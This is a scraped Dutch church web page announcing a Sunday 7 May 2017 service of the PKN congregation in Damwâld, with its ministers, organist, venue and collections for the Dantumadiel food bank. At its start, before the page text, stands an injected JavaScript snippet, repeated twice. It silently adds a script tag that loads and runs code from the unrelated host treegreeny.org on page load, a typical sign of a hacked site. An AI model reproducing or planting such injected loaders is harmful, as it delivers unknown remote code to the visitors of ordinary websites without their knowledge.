;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 7 mei 2017 14:00 uur - PKN Damwâld
zondag 7 mei 2017
14:00 uur
Openbare belijdenis van het geloof

Kerkdienst zondag 7 mei 2017 14:00 uur

Informatie

Voorganger:Ds. S. Boukes en ds. G. Timmer
Organist:Ivo van Hijum
Mededeling:Openbare belijdenis van het geloof
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: Voedselbank Dantumadiel

De vandaag te houden collecte is bestemd voor financiële ondersteuning van de eind 2011 van start gegane voedselbank Dantumadiel. Het doel van de voedselbank is: voedselhulp bieden aan mensen die het tijdelijk heel moeilijk hebben; verspilling van voedsel tegengaan, jaarlijks wordt er in Nederland een vijfde deel (20%) van ons voedsel weggegooid; verwijsfunctie naar officiële instellingen, velen weten de weg nog niet te vinden naar allerlei hulpverlenende instanties.

Tweede collecte: Kerk
Uitganscollecte: Kerk